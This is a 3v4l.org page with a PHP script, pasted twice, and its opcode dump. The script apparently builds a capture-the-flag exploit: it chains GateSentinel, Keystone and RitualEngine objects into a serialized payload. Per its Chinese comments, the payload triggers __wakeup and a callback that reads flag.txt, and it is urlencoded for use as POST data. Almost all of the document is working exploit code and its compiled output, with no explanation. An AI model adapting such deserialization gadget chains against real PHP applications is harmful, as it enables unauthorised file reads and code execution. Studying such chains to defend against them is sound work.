3v4l.org

run code in 500+ PHP versions simultaneously
<?php class RitualEngine { protected $settings; public $target; public $callback; } class Keystone { public $center; } class GateSentinel { public $object; public $tool; } // 1. 最内层 RitualEngine D:负责最终读取flag.txt $D = new RitualEngine(); $D->target = 'flag.txt'; $D->callback = null; // 用不到 // 2. RitualEngine C:callback序列化保存 [D, 'view'] $C = new RitualEngine(); $C->callback = serialize([$D, 'view']); // 3. Keystone K:center指向C $K = new Keystone(); $K->center = $C; // 4. GateSentinel B:object随意,tool['blade']指向K $B = new GateSentinel(); $B->object = 'nothing'; // 不含flag, .. , etc $B->tool = ['blade' => $K]; // 5. 最外层 GateSentinel A:object指向B,触发__wakeup $A = new GateSentinel(); $A->object = $B; // 生成payload $payload = serialize($A); echo urlencode($payload); // 输出后可用作POST data参数 ?><?php class RitualEngine { protected $settings; public $target; public $callback; } class Keystone { public $center; } class GateSentinel { public $object; public $tool; } // 1. 最内层 RitualEngine D:负责最终读取flag.txt $D = new RitualEngine(); $D->target = 'flag.txt'; $D->callback = null; // 用不到 // 2. RitualEngine C:callback序列化保存 [D, 'view'] $C = new RitualEngine(); $C->callback = serialize([$D, 'view']); // 3. Keystone K:center指向C $K = new Keystone(); $K->center = $C; // 4. GateSentinel B:object随意,tool['blade']指向K $B = new GateSentinel(); $B->object = 'nothing'; // 不含flag, .. , etc $B->tool = ['blade' => $K]; // 5. 最外层 GateSentinel A:object指向B,触发__wakeup $A = new GateSentinel(); $A->object = $B; // 生成payload $payload = serialize($A); echo urlencode($payload); // 输出后可用作POST data参数 ?>
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/4iatI
function name:  (null)
number of ops:  90
compiled vars:  !0 = $D, !1 = $C, !2 = $K, !3 = $B, !4 = $A, !5 = $payload
line      #* E I O op                               fetch          ext  return  operands
-----------------------------------------------------------------------------------------
   18     0  E >   NEW                                                  $6      'RitualEngine'
          1        DO_FCALL                                          0          
          2        ASSIGN                                                       !0, $6
   19     3        ASSIGN_OBJ                                                   !0, 'target'
          4        OP_DATA                                                      'flag.txt'
   20     5        ASSIGN_OBJ                                                   !0, 'callback'
          6        OP_DATA                                                      null
   23     7        NEW                                                  $11     'RitualEngine'
          8        DO_FCALL                                          0          
          9        ASSIGN                                                       !1, $11
   24    10        INIT_FCALL                                                   'serialize'
         11        INIT_ARRAY                                           ~15     !0
         12        ADD_ARRAY_ELEMENT                                    ~15     'view'
         13        SEND_VAL                                                     ~15
         14        DO_ICALL                                             $16     
         15        ASSIGN_OBJ                                                   !1, 'callback'
         16        OP_DATA                                                      $16
   27    17        NEW                                                  $17     'Keystone'
         18        DO_FCALL                                          0          
         19        ASSIGN                                                       !2, $17
   28    20        ASSIGN_OBJ                                                   !2, 'center'
         21        OP_DATA                                                      !1
   31    22        NEW                                                  $21     'GateSentinel'
         23        DO_FCALL                                          0          
         24        ASSIGN                                                       !3, $21
   32    25        ASSIGN_OBJ                                                   !3, 'object'
         26        OP_DATA                                                      'nothing'
   33    27        INIT_ARRAY                                           ~26     !2, 'blade'
         28        ASSIGN_OBJ                                                   !3, 'tool'
         29        OP_DATA                                                      ~26
   36    30        NEW                                                  $27     'GateSentinel'
         31        DO_FCALL                                          0          
         32        ASSIGN                                                       !4, $27
   37    33        ASSIGN_OBJ                                                   !4, 'object'
         34        OP_DATA                                                      !3
   40    35        INIT_FCALL                                                   'serialize'
         36        SEND_VAR                                                     !4
         37        DO_ICALL                                             $31     
         38        ASSIGN                                                       !5, $31
   41    39        INIT_FCALL                                                   'urlencode'
         40        SEND_VAR                                                     !5
         41        DO_ICALL                                             $33     
         42        ECHO                                                         $33
   43    43        DECLARE_CLASS                                                'ritualengine'
   49    44        DECLARE_CLASS                                                'keystone'
   53    45        DECLARE_CLASS                                                'gatesentinel'
   59    46        NEW                                                  $34     'RitualEngine'
         47        DO_FCALL                                          0          
         48        ASSIGN                                                       !0, $34
   60    49        ASSIGN_OBJ                                                   !0, 'target'
         50        OP_DATA                                                      'flag.txt'
   61    51        ASSIGN_OBJ                                                   !0, 'callback'
         52        OP_DATA                                                      null
   64    53        NEW                                                  $39     'RitualEngine'
         54        DO_FCALL                                          0          
         55        ASSIGN                                                       !1, $39
   65    56        INIT_FCALL                                                   'serialize'
         57        INIT_ARRAY                                           ~43     !0
         58        ADD_ARRAY_ELEMENT                                    ~43     'view'
         59        SEND_VAL                                                     ~43
         60        DO_ICALL                                             $44     
         61        ASSIGN_OBJ                                                   !1, 'callback'
         62        OP_DATA                                                      $44
   68    63        NEW                                                  $45     'Keystone'
         64        DO_FCALL                                          0          
         65        ASSIGN                                                       !2, $45
   69    66        ASSIGN_OBJ                                                   !2, 'center'
         67        OP_DATA                                                      !1
   72    68        NEW                                                  $49     'GateSentinel'
         69        DO_FCALL                                          0          
         70        ASSIGN                                                       !3, $49
   73    71        ASSIGN_OBJ                                                   !3, 'object'
         72        OP_DATA                                                      'nothing'
   74    73        INIT_ARRAY                                           ~54     !2, 'blade'
         74        ASSIGN_OBJ                                                   !3, 'tool'
         75        OP_DATA                                                      ~54
   77    76        NEW                                                  $55     'GateSentinel'
         77        DO_FCALL                                          0          
         78        ASSIGN                                                       !4, $55
   78    79        ASSIGN_OBJ                                                   !4, 'object'
         80        OP_DATA                                                      !3
   81    81        INIT_FCALL                                                   'serialize'
         82        SEND_VAR                                                     !4
         83        DO_ICALL                                             $59     
         84        ASSIGN                                                       !5, $59
   82    85        INIT_FCALL                                                   'urlencode'
         86        SEND_VAR                                                     !5
         87        DO_ICALL                                             $61     
         88        ECHO                                                         $61
   83    89      > RETURN                                                       1

Class RitualEngine: [no user functions]
Class Keystone: [no user functions]
Class GateSentinel: [no user functions]
Class RitualEngine: [no user functions]
Class Keystone: [no user functions]
Class GateSentinel: [no user functions]

Generated using Vulcan Logic Dumper, using php 8.5.0

preferences:
169.89 ms | 1368 KiB | 15 Q